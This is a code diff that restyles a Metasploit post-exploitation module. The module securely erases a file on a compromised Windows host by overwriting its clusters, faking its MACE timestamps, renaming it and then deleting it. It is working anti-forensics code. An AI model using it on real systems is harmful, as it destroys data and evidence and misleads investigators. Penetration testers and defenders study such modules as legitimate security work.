@@ -33,17 +33,20 @@ class MetasploitModule < Msf::Post
               stdapi_sys_config_getenv
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
 
-    register_options(
-      [
-        OptBool.new('ZERO', [ false, 'Zero overwrite. If set to false, random data will be used', false]),
-        OptInt.new('ITERATIONS', [false, 'The number of overwrite passes', 1 ]),
-        OptString.new('FILE', [true, 'File to be deleted', ''])
-      ]
-    )
+    register_options([
+      OptBool.new('ZERO', [ false, 'Zero overwrite. If set to false, random data will be used', false]),
+      OptInt.new('ITERATIONS', [false, 'The number of overwrite passes', 1 ]),
+      OptString.new('FILE', [true, 'File to be deleted', ''])
+    ])
   end
 
   def run
@@ -53,23 +56,23 @@ class MetasploitModule < Msf::Post
 
     if datastore['ZERO']
       type = 0
-      print_status("The file will be overwritten with null bytes")
+      print_status('The file will be overwritten with null bytes')
     end
 
     if !file_exist?(file)
       print_error("File #{file} does not exist")
       return
     elsif comp_encr(file)
-      print_status("File compress or encrypted. Content could not be overwritten!")
+      print_status('File compress or encrypted. Content could not be overwritten!')
     end
     file_overwrite(file, type, n)
   end
 
   # Function to calculate the size of the cluster
-  def size_cluster()
+  def size_cluster
     drive = session.sys.config.getenv('SystemDrive')
     r = session.railgun.kernel32.GetDiskFreeSpaceA(drive, 4, 4, 4, 4)
-    cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
+    cluster = r['lpBytesPerSector'] * r['lpSectorsPerCluster']
     print_status("Cluster Size: #{cluster}")
 
     return cluster
@@ -77,20 +80,20 @@ class MetasploitModule < Msf::Post
 
   # Function to calculate the real file size on disk (file size + slack space)
   def size_on_disk(file)
-    size_file = session.fs.file.stat(file).size;
+    size_file = session.fs.file.stat(file).size
     print_status("Size of the file: #{size_file}")
 
     if (size_file < 800)
       print_status("The file is too small. If it's store in the MTF (NTFS) sdel will not overwrite it!")
     end
 
-    sizeC = size_cluster()
-    size_ = size_file.divmod(sizeC)
+    cluster_size = size_cluster
+    size_ = size_file.divmod(cluster_size)
 
     if size_.last != 0
-      real_size = (size_.first * sizeC) + sizeC
+      real_size = (size_.first * cluster_size) + cluster_size
     else
-      real_size = size_.first * sizeC
+      real_size = size_.first * cluster_size
     end
 
     print_status("Size on disk: #{real_size}")
@@ -99,16 +102,16 @@ class MetasploitModule < Msf::Post
 
   # Change MACE attributes. Get a fake date by subtracting N days from the current date
   def change_mace(file)
-    rsec = Rex::Text.rand_text_numeric(7, bad = '012')
+    rsec = Rex::Text.rand_text_numeric(7, '012')
     date = Time.now - rsec.to_i
-    print_status("Changing MACE attributes")
+    print_status('Changing MACE attributes')
     session.priv.fs.set_file_mace(file, date, date, date, date)
   end
 
   # Function to overwrite the file
-  def file_overwrite(file, type, n)
+  def file_overwrite(file, type, num)
     # FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
-    r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
+    r = session.railgun.kernel32.CreateFileA(file, 'GENERIC_WRITE', 'FILE_SHARE_READ|FILE_SHARE_WRITE', nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH', 0)
     handle = r['return']
     real_size = size_on_disk(file)
 
@@ -117,22 +120,22 @@ class MetasploitModule < Msf::Post
     end
 
     i = 0
-    n.times do
+    num.times do
       i += 1
-      print_status("Iteration #{i.to_s}/#{n.to_s}:")
+      print_status("Iteration #{i}/#{num}:")
 
       if type == 1
         random = Rex::Text.rand_text(real_size, nil)
       end
 
       # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
-      session.railgun.kernel32.SetFilePointer(handle, 0, nil, "FILE_BEGIN")
+      session.railgun.kernel32.SetFilePointer(handle, 0, nil, 'FILE_BEGIN')
 
       # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
       w = session.railgun.kernel32.WriteFile(handle, random, real_size, 4, nil)
 
       if w['return'] == false
-        print_error("The was an error writing to disk, check permissions")
+        print_error('The was an error writing to disk, check permissions')
         return
       end
 
@@ -144,13 +147,13 @@ class MetasploitModule < Msf::Post
 
     # Generate a long random file name before delete it
     newname = Rex::Text.rand_text_alpha(200, nil)
-    print_status("Changing file name")
+    print_status('Changing file name')
 
     # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
     session.railgun.kernel32.MoveFileA(file, newname)
 
     file_rm(newname)
-    print_good("File erased!")
+    print_good('File erased!')
   end
 
   # Check if the file is encrypted or compressed
